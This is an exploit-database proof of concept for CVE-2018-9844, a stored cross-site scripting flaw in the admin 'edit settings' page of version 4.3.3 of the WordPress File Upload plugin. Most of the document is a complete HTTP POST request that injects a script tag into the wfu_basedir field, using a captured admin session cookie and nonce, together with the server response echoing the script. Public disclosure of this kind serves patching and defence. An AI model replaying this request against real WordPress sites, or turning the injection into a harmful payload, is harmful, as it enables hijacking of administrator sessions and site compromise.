CVE-2018-9844

1. # Exploit Title: WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS
2. # Date: 06/04/2018
3. # Exploit Author: ManhNho
4. # Vendor Homepage: https://www.iptanus.com/
5. # Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip
6. # Version: 4.3.3
7. # Tested on: Windows 7 / Cent OS 6.5
8. # CVE : CVE-2018-9844
9. # Category : Webapps
10.  
11. Description
12. ===========
13. WordPress File Upload is a WordPress plugin with more than 20.000 active
14. installations.
15. Version 4.3.3 (and possibly previous versions) are affected by a Stored XSS
16. vulnerability in the admin panel ,related to the "Edit_Setting"
17. functionality.
18.  
19.  
20. PoC
21. ===============
22. Request:
23.  
24. POST /wp-admin/options-general.php?page=wordpress_file_upload&action=edit_settings
25. HTTP/1.1
26. Host: 192.168.1.66
27. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101
28. Firefox/59.0
29. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
30. Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
31. Accept-Encoding: gzip, deflate
32. Referer: http://192.168.1.66/wp-admin/options-general.php?page=
33. wordpress_file_upload&action=plugin_settings
34. Content-Type: multipart/form-data; boundary=---------------------
35. ------27678165033834
36. Content-Length: 906
37. Cookie: wordpress_ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
38. 7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7Ca3c7a75afaaf9ce1db3596b8aa83
39. 3adeb337f313ef5156fbf93096c1af0cdbbc; wp-settings-1=libraryContent%3Dbrowse;
40. wp-settings-time-1=1522504284; PHPSESSID=o6smfv1u6p8rh7cu7v7gl9lm47;
41. wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_
42. ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
43. 7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7C1993c93121805782b8bee82cd013
44. 6f1a6aa286d4294ed58cb6f95539acdfe5d5
45. Connection: close
46. Upgrade-Insecure-Requests: 1
47.  
48. -----------------------------27678165033834
49. Content-Disposition: form-data; name="_wpnonce"
50.  
51. c9d5733e36
52. -----------------------------27678165033834
53. Content-Disposition: form-data; name="_wp_http_referer"
54.  
55. /wp-admin/options-general.php?page=wordpress_file_upload&
56. action=plugin_settings
57. -----------------------------27678165033834
58. Content-Disposition: form-data; name="action"
59.  
60. edit_settings
61. -----------------------------27678165033834
62. Content-Disposition: form-data; name="wfu_basedir"
63.  
64. <script>alert('XSS')</script>
65. -----------------------------27678165033834
66. Content-Disposition: form-data; name="wfu_postmethod"
67.  
68. fopen
69. -----------------------------27678165033834
70. Content-Disposition: form-data; name="wfu_admindomain"
71.  
72. siteurl
73. -----------------------------27678165033834
74. Content-Disposition: form-data; name="submitform"
75.  
76. Update
77. -----------------------------27678165033834--
78.  
79. Response:
80.  
81. HTTP/1.1 200 OK
82. Date: Thu, 05 Apr 2018 18:15:01 GMT
83. Server: Apache/2.2.15 (CentOS)
84. X-Powered-By: PHP/5.3.3
85. Expires: Wed, 11 Jan 1984 05:00:00 GMT
86. Cache-Control: no-cache, must-revalidate, max-age=0
87. Pragma: no-cache
88. X-Frame-Options: SAMEORIGIN
89. Referrer-Policy: same-origin
90. Connection: close
91. Content-Type: text/html; charset=UTF-8
92. Content-Length: 28623
93. ...
94.  
95. <input name="wfu_basedir" id="wfu_basedir" type="text"
96. value="<script>alert('XSS')</script>" />
97. <p style="cursor: text; font-size:9px; padding: 0px; margin: 0px; width:
98. 95%; color: #AAAAAA;">Current value: <strong><script>alert('XSS')</
99. script></strong></p>
100. ...
101.  
102.  
103. References
104. ===============
105. https://www.iptanus.com/new-version-4-3-4-of-wordpress-file-upload-plugin/
106. https://wordpress.org/plugins/wp-file-upload/#developers
107. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9844
108. https://www.exploit-db.com/exploits/44444/